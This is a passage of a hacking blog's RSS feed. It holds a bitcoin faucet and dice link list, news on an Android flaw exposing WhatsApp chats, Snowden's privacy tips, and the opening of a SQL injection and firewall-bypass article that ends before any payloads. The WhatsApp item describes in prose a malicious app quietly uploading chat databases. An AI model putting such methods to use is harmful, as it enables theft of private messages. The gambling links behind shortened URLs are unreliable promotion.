</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Listing Website Free Bitcoin Part 1</title><link>http://dzhenway.slackerc0de.us/2014/03/listing-website-free-bitcoin-part-1.html</link><category>Bitcoin</category><category>Bitcoin Gratis</category><category>BTC</category><category>Dices</category><category>Free Bitcoin</category><category>Info</category><category>mBTC</category><category>Roll</category><category>uBTC</category><pubDate>Fri, 21 Mar 2014 22:51:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-2373907213076830392</guid><description>Free Bitcoin? yah bener sekali&lt;div&gt;
Disini saya akan membagikan beberapa situs yang bisa kita gunakan untuk mendapatkan bitcoin secara gratis. Ada yang harus mengetik captcha ada juga yang harus menunggu beberapa menit atau jam dan lain sebagainya.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
So, Cekidot bro !!!&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; line-height: 19.31999969482422px;"&gt;&lt;span style="font-size: large;"&gt;ROLL &amp;amp; DICES&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; line-height: 19.31999969482422px;"&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: #141823; font-family: Helvetica, Arial, lucida grande, tahoma, verdana, arial, sans-serif;"&gt;&lt;span style="background-color: white; line-height: 19.31999969482422px;"&gt;&lt;span style="font-size: x-small;"&gt;1&lt;/span&gt;.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f7nz (FreeBitCoinWin) 1 jam untuk 1x ROLL&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;2. &amp;nbsp;&lt;/b&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f7px (FreeBitCoin) 1 jam untuk 1x Roll&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;3.&amp;nbsp;&lt;/b&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f7qy (BTCFreeGame)&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;4.&amp;nbsp;&lt;/b&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f7s1 (999Dice)&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;5.&amp;nbsp;&lt;/b&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f8fq (&lt;/b&gt;&lt;span style="font-family: Arial, sans-serif;"&gt;&lt;span style="font-size: 12px; line-height: 18px;"&gt;&lt;b&gt;gratisbitco)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: Arial, sans-serif; text-align: center;"&gt;&lt;span style="font-size: 12px; line-height: 18px;"&gt;&lt;b&gt;6.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style="font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: center;"&gt;http://cur.lv/8f8nb (&lt;/b&gt;&lt;span style="font-family: Arial, sans-serif; text-align: center;"&gt;&lt;span style="font-size: 12px; line-height: 18px;"&gt;&lt;b&gt;phambit) 1 jam untuk 1x menggambar&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.31999969482422px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.31999969482422px;"&gt;sekian dulu info tentang website yang menyediakan bitcoin secara gratis, nantinya bakalan saya share lebih banyak lagi.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.31999969482422px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #141823; font-family: Helvetica, Arial, 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.31999969482422px;"&gt;regards : Wayc0de&lt;/span&gt;&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Hackers can steal Whatsapp conversations due to Android security flaw</title><link>http://dzhenway.slackerc0de.us/2014/03/hackers-can-steal-whatsapp.html</link><category>Android</category><category>Attack</category><category>Hacker</category><category>Hacking</category><category>Info</category><category>Whatsapp</category><pubDate>Thu, 13 Mar 2014 14:17:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-154992364608304175</guid><description>&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
&lt;strong&gt;A SECURITY VULNERABILTIY&lt;/strong&gt;&amp;nbsp;in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.theinquirer.net/IMG/962/246962/whatsapp-logo-270x167.png?1359472257" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.theinquirer.net/IMG/962/246962/whatsapp-logo-270x167.png?1359472257" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
The full step by step guide for how he&amp;nbsp;hacked Whatsapp can be found in Bosschert's blog post.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
Whatsapp added privacy features and the ability to pay for a friend's subscription&amp;nbsp;when it updated its Android app on Monday.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy&lt;/div&gt;
&lt;div style="background-color: white; color: #464646; font-family: Verdana; font-size: 13px; line-height: 1.32em; padding: 10px 0px 0px;"&gt;
&lt;a href="http://www.theinquirer.net/inquirer/news/2333842/hackers-can-steal-whatsapp-conversations-due-to-android-security-flaw"&gt;Sumber&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>How to Use Edward Snowden’s Three Tips for Digital Privacy</title><link>http://dzhenway.slackerc0de.us/2014/03/how-to-use-edward-snowdens-three-tips.html</link><category>Digital Privacy</category><category>Edward Snowden</category><category>Encrypt</category><category>encryption</category><category>Hard Drive</category><category>Info</category><category>Privacy</category><category>Tips and trik</category><category>TOR</category><pubDate>Thu, 13 Mar 2014 00:31:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-3118909442208257554</guid><description>&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Former NSA contractor&amp;nbsp;&lt;span class="mandelbrot_refrag"&gt;Edward Snowden&lt;/span&gt;&amp;nbsp;says he has been able to outfox U.S. officials using encryption. During a&amp;nbsp;webcast on NSA leaks and data security&amp;nbsp;at the&amp;nbsp;South by Southwest conference in Austin, Texas, Snowden shared&amp;nbsp;some privacy tips for the rest of us: Encrypt your hard drive, use plug-ins for your browser that prevent organizations or companies from tracking you online, and cover your tracks with Tor, an online network that promises anonymity.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
These tips range from simple to complicated depending on your computer savvy, so we’ve collected some basic info and guides to help you get started:&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
&lt;strong&gt;Encrypt your hard drive&lt;/strong&gt;&lt;em&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/em&gt;Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Adding password protection to files on your computer is just the first step to personal file security. Encrypting the entire hard disk on your computer ensures personal information is secure, even if your device is stolen or seized.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Newer versions of Windows and Mac operating systems come with built-in disk encryption tools.&amp;nbsp;&lt;a data-ls-clicked="1" data-ls-seen="1" href="http://windows.microsoft.com/en-us/windows7/products/features/bitlocker" style="color: #115b8f; outline: none; text-decoration: none;" title="Bitlocker for Windows"&gt;BitLocker&lt;/a&gt;, which encrypts your entire hard drive, comes as part of Windows 7 Ultimate and Enterprise versions, and&amp;nbsp;&lt;a data-ls-seen="1" href="http://technet.microsoft.com/en-us/windows/jj737997.aspx" style="color: #115b8f; outline: none; text-decoration: none;"&gt;Windows 8.1 Pro and Enterprise editions&lt;/a&gt;.&amp;nbsp;&lt;a data-ls-seen="1" href="https://support.%3Ca%20href%3D/" http:="" main.html="" name="Apple" public="" quotes="" style="color: #115b8f; outline: none; text-decoration: none;" type="djn&amp;amp;symbol=&amp;quot;"&gt;Apple&lt;/a&gt;&lt;span data-ticker-name="" data-widget="dj.ticker"&gt;&lt;/span&gt;offer detailed tutorials online on how disk encryption services can be turned on. For those with older operating systems,&amp;nbsp;&lt;a data-ls-clicked="1" data-ls-seen="1" href="http://www.truecrypt.org/docs/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;TrueCrypt&lt;/a&gt;, there’s a free program for encrypting your drive. Here’s a guide on how to download and&amp;nbsp;&lt;a data-ls-clicked="1" data-ls-seen="1" href="http://www.maximumpc.com/article/howtos/how_to_encrypt_your_entire_hard_drive_the_easy_way_using_truecrypt" style="color: #115b8f; outline: none; text-decoration: none;"&gt;install it&lt;/a&gt;.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
The Electronic Frontier Foundation, an organization that works on digital rights issues, has&amp;nbsp;&lt;a data-ls-seen="1" href="https://ssd.eff.org/tech/disk-encryption" style="color: #115b8f; outline: none; text-decoration: none;"&gt;a guide to how encryption can help&lt;/a&gt;&amp;nbsp;in different situations.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
&lt;strong&gt;Use browser plug-ins to avoid being tracked online&lt;/strong&gt;The Wall Street Journal’s series ‘What They Know‘ showed companies are using digital tracking for online activities such as shopping, varying prices based on shopping patterns and location information. While that may seem harmless, it’s important to know that if retailers can see you, it’s likely that others can as well.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Slowly, companies such as Google have agreed to support a&amp;nbsp;do-not-track button to be embedded in most Web browsers. Google’s Chrome browser has&amp;nbsp;a setting that most users&amp;nbsp;&lt;a data-ls-seen="1" href="http://howto.cnet.com/8301-11310_39-57546359-285/how-to-enable-chromes-do-not-track-option/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;can turn on&lt;/a&gt;&amp;nbsp;to send a do-not-track request, and so does Microsoft’s Internet Explorer 10. They&amp;nbsp;won’t work with all websites, but it’s a good place to begin.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Plug-ins or small software extensions available for browsers are another way to go about it.&amp;nbsp;&lt;a data-ls-seen="1" href="https://www.ghostery.com/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;Ghostery&lt;/a&gt;, a plug-in available for most popular browsers, when installed will&amp;nbsp;&lt;a data-ls-seen="1" href="http://www.digitaltrends.com/web/do-not-track-plus-vs-ghostery/#!zcXqC" style="color: #115b8f; outline: none; text-decoration: none;"&gt;show the number of trackers detected&lt;/a&gt;&amp;nbsp;but not automatically block them. Users have the choice to individually or in bulk block these trackers.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
You can also choose sites, such as the search engine&amp;nbsp;&lt;a data-ls-seen="1" href="https://duckduckgo.com/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;DuckDuckGo&lt;/a&gt;, which do not record or share your searches.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
&lt;strong&gt;Cover your tracks with Tor&amp;nbsp;&lt;/strong&gt;Over the last few months,&amp;nbsp;&lt;a data-ls-seen="1" href="https://www.torproject.org/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;Tor&lt;/a&gt;, a network that promises anonymity and privacy online has come under the spotlight. Tor hosts a network of websites, some of which have been under the scanner of law enforcement officials for illegal activities. Late last year, the Federal Bureau of Investigation&amp;nbsp;shut down Silk Road, a marketplace available only through the Tor network, for the sale of illegal drugs.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Tor may be useful for criminals, but its cloak of anonymity is increasingly a comfort to anyone looking for privacy. Tor offers its own browser that can be used to connect to news sites or instant messaging services and chat rooms that can’t be easily tracked online.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
To get started on the Tor network, take the&amp;nbsp;&lt;a data-ls-seen="1" href="http://www.extremetech.com/computing/101633-how-to-use-tor-and-is-it-actually-safe-and-anonymous" style="color: #115b8f; outline: none; text-decoration: none;"&gt;advice of the ExtremeTech blog&lt;/a&gt;, and download the Tor Browser Bundle&amp;nbsp;available for Windows, Mac and Linux. It’s similar to using the Firefox or Chrome browser but slower, because Internet traffic is routed through a series of proxies to mask its origin.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
Other ways to lower your online profile include using encrypted chat services such as&amp;nbsp;&lt;a data-ls-seen="1" href="https://silentcircle.com/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;SilentCircle&lt;/a&gt;, and encrypted mail such as&amp;nbsp;&lt;a data-ls-seen="1" href="https://www.hushmail.com/" style="color: #115b8f; outline: none; text-decoration: none;"&gt;Hushmail&lt;/a&gt;. There are even&amp;nbsp;smartphones coming out soon&amp;nbsp;that will offer a suite of privacy features baked right in.&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 1.314em; margin-bottom: 1em; padding: 0px;"&gt;
&lt;a href="http://blogs.wsj.com/"&gt;Sumber&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Playing with SQL Injection and Firewall Bypassing</title><link>http://dzhenway.slackerc0de.us/2014/03/playing-with-sql-injection-and-firewall.html</link><category>Article</category><category>Bypass</category><category>Cyber Crime</category><category>Firewall</category><category>Hacking</category><category>MySQL</category><category>Oracle</category><category>Pentester</category><category>Security</category><category>SQL-Injection</category><category>SQLMAP</category><pubDate>Mon, 10 Mar 2014 23:39:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-1999907373359191806</guid><description>&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Playing with SQL Injection and Firewall Bypassing&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; line-height: 12.649999618530273px;"&gt;&lt;v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f" style="box-sizing: border-box;"&gt;&lt;v:stroke joinstyle="miter" style="box-sizing: border-box;"&gt;&lt;v:formulas style="box-sizing: border-box;"&gt;&lt;v:f eqn="if lineDrawn pixelLineWidth 0" style="box-sizing: border-box;"&gt;&lt;v:f eqn="sum @0 1 0" style="box-sizing: border-box;"&gt;&lt;v:f eqn="sum 0 0 @1" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @2 1 2" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @3 21600 pixelWidth" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @3 21600 pixelHeight" style="box-sizing: border-box;"&gt;&lt;v:f eqn="sum @0 0 1" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @6 1 2" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @7 21600 pixelWidth" style="box-sizing: border-box;"&gt;&lt;v:f eqn="sum @8 21600 0" style="box-sizing: border-box;"&gt;&lt;v:f eqn="prod @7 21600 pixelHeight" style="box-sizing: border-box;"&gt;&lt;v:f eqn="sum @10 21600 0" style="box-sizing: border-box;"&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:f&gt;&lt;/v:formulas&gt;&lt;v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f" style="box-sizing: border-box;"&gt;&lt;o:lock aspectratio="t" style="box-sizing: border-box;" v:ext="edit"&gt;&lt;/o:lock&gt;&lt;/v:path&gt;&lt;/v:stroke&gt;&lt;/v:shapetype&gt;&lt;v:shape id="Imagem_x0020_12" o:spid="_x0000_i1040" style="box-sizing: border-box; height: 327.75pt; visibility: visible; width: 443.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image001.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;/span&gt;&lt;/b&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; line-height: 12.649999618530273px;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: #274e13;"&gt;&lt;b style="box-sizing: border-box;"&gt;Disclaimer:&amp;nbsp;&lt;/b&gt;&lt;i style="box-sizing: border-box;"&gt;This article is only for educational purposes, security researchers, and pentester. I would like to clarify that I am completely against cyber-crime.&lt;/i&gt;&lt;/span&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif; line-height: 12.649999618530273px;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;ABSTRACT&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;i style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; color: #0c343d; font-family: Georgia, 'Times New Roman', serif;"&gt;Most cyber-attacks in the world that involve websites occurs due to lack of updates and configuration faults resulting in explorations of success.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;i style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; color: #0c343d; font-family: Georgia, 'Times New Roman', serif;"&gt;One of the main threats is SQL Injection that left many worried about their systems, programmers, and SQL databases.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;i style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: #0c343d;"&gt;The biggest problem is not the DBMS itself but the lack of definition and verification of the input fields in web applications&lt;/span&gt;&lt;span style="box-sizing: border-box; color: #274e13;"&gt;.&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;CONTEXT&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Many web developers do not know how SQL queries can be handled and assume that an SQL query is a trusted command. This allows for SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. And sometimes SQL queries even may allow access to the command shell on the server operating system level.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data or to override valuable data, and even to execute dangerous system level commands on the server.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;br style="box-sizing: border-box;" /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
